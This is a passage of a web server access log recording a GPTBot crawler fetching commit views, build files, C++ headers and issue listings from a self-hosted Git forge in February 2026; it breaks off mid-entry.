GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:17:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" -[17/Feb/2026:17:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11445] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11446] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10107] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__" [Client 74.7.227.38] [Length 21491] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" -[17/Feb/2026:17:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23941] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" -[17/Feb/2026:17:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56428] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" -[17/Feb/2026:17:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=all&type=all" -[17/Feb/2026:17:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot" [Client 74.7.227.38] [Length 60528] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:17:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor" [Client 74.7.227.38] [Length 60553] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:17:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:17:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 